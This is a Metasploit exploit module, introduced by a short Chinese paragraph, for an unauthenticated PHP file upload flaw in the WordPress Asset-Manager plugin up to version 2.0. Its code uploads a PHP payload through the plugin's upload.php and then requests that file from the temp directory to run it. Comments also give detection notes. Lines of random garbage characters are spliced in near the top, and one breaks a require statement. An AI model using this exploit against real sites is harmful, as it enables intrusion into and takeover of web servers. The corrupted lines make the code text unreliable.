这个模块利用 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 PHP 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
2 E: h" e3 e5 f3 A4 \" Q4 g; Z0 z& }5 E. M* s5 t' w
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
. a3 l. Q5 ~' h
require 'msf/core'
+ L [ h5 q2 M8 b5 `% I& {* qrequire 'msf/core/exploit/php_exe'+ n! s4 _+ u+ i" `0 @
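class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata. The affected range on record is Asset-Manager <= 2.0.
  # The two request paths used by `exploit` (the plugin's upload.php and the
  # uploads/assets/temp directory) are the concrete indicators a defender can
  # monitor for this issue.
  #
  # @param info [Hash] module info merged with the values registered here
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT',                           # initial discovery
          'James Fitts <fitts.james[at]gmail.com>'  # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads the PHP payload through the plugin's upload.php and then requests
  # it from the plugin's temp directory so the web server executes it.
  #
  # Detection notes, taken from the two requests issued below:
  #  * an unauthenticated multipart POST to
  #    wp-content/plugins/asset-manager/upload.php carrying a "Filedata" part
  #    whose filename ends in .php, followed by
  #  * a GET for a .php file under wp-content/uploads/assets/temp/.
  # Denying script execution in that upload directory stops the second step
  # even if the first one succeeds.
  #
  # Fails via fail_with(UnexpectedReply) when the upload response does not
  # echo the stored filename, or when the execution request returns an
  # explicit non-200 status.
  def exploit
    base = target_uri.path
    # Build a new string rather than appending in place, so the path object
    # returned by target_uri is not mutated as a side effect.
    base = "#{base}/" unless base.end_with?('/')
    peer = "#{rhost}:#{rport}"

    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload  = get_write_exec_payload(:unlink_self => true)

    # Multipart body with a single "Filedata" part carrying the payload file.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, 'application/octet-stream', nil,
                  "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drop a CRLF that may precede the first "--_Part_" boundary so the body
    # starts with the boundary itself.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The upload counts as successful only when the server echoes the stored
    # filename. A plain substring test replaces the previous interpolated
    # regex, whose unescaped '.' matched any character.
    unless res && res.code == 200 && res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{base}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is deliberately tolerated here (as in the original
    # check); only an explicit non-200 status is reported as a failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end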
|